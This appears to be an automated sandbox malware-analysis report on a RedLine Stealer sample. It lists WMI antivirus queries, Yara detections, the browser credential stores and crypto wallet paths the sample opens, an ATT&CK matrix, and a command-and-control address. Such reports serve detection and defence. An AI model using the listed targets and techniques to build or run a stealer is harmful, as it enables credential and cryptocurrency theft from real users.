                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Users\user\AppData\Roaming\WltfeVzR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Users\user\AppData\Roaming\WltfeVzR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: WltfeVzR.exe, 00000010.00000002.2335155769.0000000006D46000.00000004.00000020.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2331810633.000000000649A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4159340.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4141520.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4210970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4228790.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4159340.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4141520.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4228790.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: tfF3UBTdr8.exe PID: 6532, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: tfF3UBTdr8.exe PID: 1492, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WltfeVzR.exe PID: 1868, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WltfeVzR.exe PID: 6784, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $sq2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereumx
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $sq6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4159340.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4141520.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4210970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4228790.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4159340.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4141520.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4228790.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: tfF3UBTdr8.exe PID: 6532, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: tfF3UBTdr8.exe PID: 1492, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WltfeVzR.exe PID: 1868, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WltfeVzR.exe PID: 6784, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4159340.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4141520.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4210970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4228790.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4159340.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.WltfeVzR.exe.4141520.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4228790.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: tfF3UBTdr8.exe PID: 6532, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: tfF3UBTdr8.exe PID: 1492, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WltfeVzR.exe PID: 1868, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WltfeVzR.exe PID: 6784, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		331
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol3
                    Data from Local System                    		11
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		241
                    Virtualization/Sandbox Evasion                    		Security Account Manager241
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture12
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing                    		Cached Domain Credentials113
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501611 Sample: tfF3UBTdr8.exe Startdate: 30/08/2024 Architecture: WINDOWS Score: 100 50 api.ip.sb 2->50 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 11 other signatures 2->60 8 tfF3UBTdr8.exe 7 2->8         started        12 WltfeVzR.exe 2->12         started        signatures3 process4 file5 42 C:\Users\user\AppData\Roaming\WltfeVzR.exe, PE32 8->42 dropped 44 C:\Users\...\WltfeVzR.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmp8652.tmp, XML 8->46 dropped 48 C:\Users\user\AppData\...\tfF3UBTdr8.exe.log, ASCII 8->48 dropped 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->62 64 Found many strings related to Crypto-Wallets (likely being stolen) 8->64 66 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 8->66 68 Adds a directory exclusion to Windows Defender 8->68 14 tfF3UBTdr8.exe 15 49 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        70 Multi AV Scanner detection for dropped file 12->70 72 Injects a PE file into a foreign processes 12->72 22 WltfeVzR.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 52 185.222.57.91, 49711, 49714, 49718 ROOTLAYERNETNL Netherlands 14->52 74 Found many strings related to Crypto-Wallets (likely being stolen) 14->74 76 Tries to steal Crypto Currency Wallets 14->76 26 conhost.exe 14->26         started        78 Uses schtasks.exe or at.exe to add and modify task schedules 18->78 80 Loading BitLocker PowerShell Module 18->80 28 conhost.exe 18->28         started        30 conhost.exe 20->30         started        32 conhost.exe 20->32         started        34 schtasks.exe 1 20->34         started        36 WmiPrvSE.exe 20->36         started        82 Tries to harvest and steal browser information (history, passwords, etc) 22->82 38 conhost.exe 22->38         started        40 conhost.exe 24->40         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    tfF3UBTdr8.exe68%ReversingLabsByteCode-MSIL.Spyware.Redline
                    tfF3UBTdr8.exe45%VirustotalBrowse
                    tfF3UBTdr8.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\WltfeVzR.exe68%ReversingLabsByteCode-MSIL.Spyware.Redline
                    C:\Users\user\AppData\Roaming\WltfeVzR.exe45%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    api.ip.sb0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://ipinfo.io/ip%appdata%0%URL Reputationsafe
                    https://ipinfo.io/ip%appdata%0%URL Reputationsafe
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettings0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/GetUpdates0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                    http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdate0%URL Reputationsafe
                    http://tempuri.org/00%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/actor/next0%URL Reputationsafe
                    http://185.222.57.91:556150%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    http://185.222.57.91:55615/0%Avira URL Cloudsafe
                    http://ns.adobe.0/xmp0%Avira URL Cloudsafe
                    http://tempuri.org/0%Avira URL Cloudsafe
                    185.222.57.91:556150%Avira URL Cloudsafe
                    http://185.222.57.91:55615t-sq0%Avira URL Cloudsafe
                    http://185.222.57.91:55615/3%VirustotalBrowse
